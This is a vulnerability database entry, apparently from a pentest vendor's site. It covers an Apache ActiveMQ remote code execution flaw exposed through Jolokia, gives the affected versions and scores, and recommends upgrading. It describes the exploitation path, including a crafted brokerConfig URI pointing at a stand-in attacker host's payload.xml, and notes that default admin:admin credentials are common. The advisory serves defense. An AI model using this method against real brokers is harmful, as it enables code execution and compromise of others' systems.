[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"all-banners":3,"FooterNav_JsYsxvLufb1W12aeknKZ89on0MD0bNDTiB5EYxyxmU":43,"SkipToContent_34xgpJIRRkpiT6ls6jE4NHf7VpvQCQBEwi69exi4oT0":50,"FooterSocial_u16tCafBUeGMoDrdLfTINytP2JB5msc6iB3VDUutAoU":56,"vulnerability-29500":63},[4,15,23,28],{"title":5,"slug":6,"text":7,"link":8,"external":9,"targets":10,"cta":12,"variant":13,"campaign_id":14},"wp2shell (Vuln DB homepage)","wp2shell-vuln-db","Emergency CVE response: detection & exploitation now available for *wp2shell*, the critical WP RCE chain","https://pentest-tools.com/vulnerabilities-exploits/wordpress-core-69-701-pre-auth-blind-sql-injection-batch-route-confusion_29451",false,[11],"/vulnerabilities-exploits/","See CVE details","secondary","wp2shell",{"title":16,"slug":17,"text":18,"link":19,"external":9,"targets":20,"cta":22,"variant":13,"campaign_id":14},"wp2shell (CVE page - exploitation)","wp2shell-cve-page-exploit","Validate wp2shell exposure & mitigation! Detect with any plan. Exploit with Pentest Suite.","https://pentest-tools.com/pricing",[21],"/vulnerabilities-exploits/wp2shell-wordpress-core-690-694-and-700-701-pre-auth-batch-route-confusion-leading-to-sql-injection_29452","Explore plans",{"title":24,"slug":25,"text":18,"link":19,"external":9,"targets":26,"cta":22,"variant":13,"campaign_id":14},"wp2shell (CVE page - detection)","wp2shell-cve-page",[27],"/vulnerabilities-exploits/wordpress-core-69-701-pre-auth-blind-sql-injection-batch-route-confusion_29451",{"title":29,"slug":30,"text":31,"link":32,"external":9,"targets":33,"cta":42,"variant":13,"campaign_id":30},"DEF CON AI pentests launch","def-con-ai-pentests","We’re launching AI Pentests at DEF CON 34","https://pentest-tools.com/events/defcon-34-2026",[34,35,36,37,38,39,40,41],"/","/website-vulnerability-scanning/website-scanner","/network-vulnerability-scanning/network-security-scanner-online","/information-gathering/find-subdomains-of-domain","/network-vulnerability-scanning/port-scanner-online-nmap","/product","/website-vulnerability-scanning/discover-hidden-directories-and-files","/insights","See you there",["Island",44],{"key":45,"params":46,"result":48},"FooterNav_JsYsxvLufb1W12aeknKZ89on0MD0bNDTiB5EYxyxmU",{"props":47},"{}",{"head":49},{},["Island",51],{"key":52,"params":53,"result":54},"SkipToContent_34xgpJIRRkpiT6ls6jE4NHf7VpvQCQBEwi69exi4oT0",{"props":47},{"head":55},{},["Island",57],{"key":58,"params":59,"result":61},"FooterSocial_u16tCafBUeGMoDrdLfTINytP2JB5msc6iB3VDUutAoU",{"props":60},"{\"text-color\":\"gray\"}",{"head":62},{},{"id":64,"detectable_with":65,"vuln_details":71,"vuln_id":95,"name":96,"published":97,"updated":97},29500,{"tool":66,"engine":69},{"id":67,"name":68},1,"Network Scanner",{"id":67,"name":70},"Sniper",{"id":64,"codename":72,"description":73,"severity":74,"risk_description":75,"public_description":76,"public_recommendation":77,"recommendation":78,"references":79,"cvssv3":83,"epss_score":84,"epss_percentile":85,"cve":86,"in_cisa_catalog":88,"date":89,"software_type":90,"vendor":91,"product":92,"ptt_exploit_capabilities":93},null,"We found that the target Apache ActiveMQ broker is vulnerable to remote code execution via its Jolokia JMX-HTTP bridge. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans, including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that causes the VM transport brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext. Because ResourceXmlApplicationContext instantiates singleton beans before BrokerService validates the configuration, attacker-controlled bean factory methods such as Runtime.exec() execute on the broker JVM. Default credentials (admin:admin) are commonly present, lowering the effective barrier to exploitation. This issue affects Apache ActiveMQ Broker before 5.19.4 and versions from 6.0.0 before 6.2.3.","high","Successful exploitation yields arbitrary code execution within the broker JVM, which can lead to full system compromise, sensitive data theft, ransomware installation, or lateral movement to the internal network. The vulnerability is rated high severity and is practical to exploit when the Jolokia endpoint is network-reachable and default or weak credentials are in use.","Apache ActiveMQ is vulnerable to remote code execution through its Jolokia JMX-HTTP bridge. The default access policy allows authenticated callers to invoke BrokerService.addNetworkConnector with a crafted URI containing brokerConfig=xbean:http://attacker-host/payload.xml. The broker fetches the remote URL and instantiates the Spring beans it contains before any configuration validation, so attacker-supplied bean factory methods execute directly on the broker JVM. Default credentials are widely present, making exploitation straightforward in practice.","Upgrade Apache ActiveMQ to version 5.19.5 or 6.2.3 or later and restrict network access to the Jolokia management endpoint.","We recommend upgrading Apache ActiveMQ to version 5.19.5 or 6.2.3 or later. Additionally, restrict or disable Jolokia exec access on the management interface and ensure the ActiveMQ web console is not publicly exposed. Replace default credentials immediately if the broker must remain internet-reachable.",[80,81,82],"https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/","https://activemq.apache.org/security-advisories","https://nvd.nist.gov/vuln/detail/CVE-2026-34197",8.8,0.9722,0.99888,[87],"CVE-2026-34197",true,"2026-04-07T00:00:00Z","Message Broker","Apache","ActiveMQ",[94],"RCE","NETSCAN-SNIPER-CVE-2026-34197","Apache ActiveMQ - Remote Code Execution","2026-07-21T00:00:00Z"]